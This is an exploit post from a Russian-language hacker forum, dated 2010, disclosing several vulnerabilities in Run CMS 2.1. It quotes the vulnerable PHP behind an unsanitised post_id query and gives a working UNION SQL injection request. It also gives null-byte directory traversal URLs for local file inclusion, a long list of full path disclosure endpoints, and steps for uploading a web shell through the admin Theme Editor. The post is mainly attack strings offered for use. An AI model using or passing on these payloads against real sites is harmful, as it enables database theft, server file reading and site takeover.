13.05.2010, 15:19
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Run CMS 2.1
www.runcms.org
SQL-Injection
file:/modules/forum/reply.php
PHP код:
include_once("class/class.forumposts.php");
$forumpost = new ForumPosts($post_id);
file:/modules/forum/class/class.forumposts.php
PHP код:
function ForumPosts($id=-1) {
if ( is_array($id) ) {
$this->makePost($id);
} elseif ( $id != -1 ) {
$this->getPost($id);
}
}
...
function getPost($id) {
...
$sql = "SELECT * FROM ".$bbTable['posts']." WHERE post_id=$id";
$array = $db->fetch_array($db->query($sql));
...
result:
Код:
GET /modules/forum/reply.php?forum=3&post_id=-4+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0
LFI
need: administrator account, mq=off
Код:
/modules/system/admin.php?fct=tpleditor&op=file_edit&module=../../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=css_edit&module=../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=tpl_module_edit&module=../../[local_file]%00&tpl=1
Full Path Disclosure
Код:
/footer.php
/header.php
/class/core.php
/class/groupaccess.php
/class/rcxblock.php
/class/rcxcomments.php
/class/rcxformloader.php
/class/rcxgroup.php
/class/rcxpm.php
/class/rcxstory.php
/class/rcxtopic.php
/class/rcxuser.php
/class/database/mysql.php
/class/form/formbutton.php
/class/form/formcheckbox.php
/class/form/formdatetime.php
/class/form/formdhtmleseditor.php
/class/form/formdhtmlfckeditor.php
/class/form/formdhtmltextarea.php
/class/form/formelementtray.php
/class/form/formfile.php
/class/form/formheadingrow.php
/class/form/formhidden.php
/class/form/formlabel.php
/class/form/formpassword.php
/class/form/formradio.php
/class/form/formradioyn.php
/class/form/formselect.php
/class/form/formselectcountry.php
/class/form/formselectgroup.php
/class/form/formselectlang.php
/class/form/formselectmatchoption.php
/class/form/formselectmodule.php
/class/form/formselecttheme.php
/class/form/formselecttimezone.php
/class/form/formselectuser.php
/class/form/formtext.php
/class/form/formtextarea.php
/class/form/formtextdateselect.php
/class/form/simpleform.php
/class/form/tableform.php
/class/form/themeform.php
upload shell
need: administrator account
Логинимся.. Идём в System Admin -> Theme Editor -> архивируем шелл (*.zip) -> жмём upload
шелл будет доступен по адресу http://site.ru/themes/shell.php
Последний раз редактировалось .:[melkiy]:.; 13.05.2010 в 17:18..
|
|
|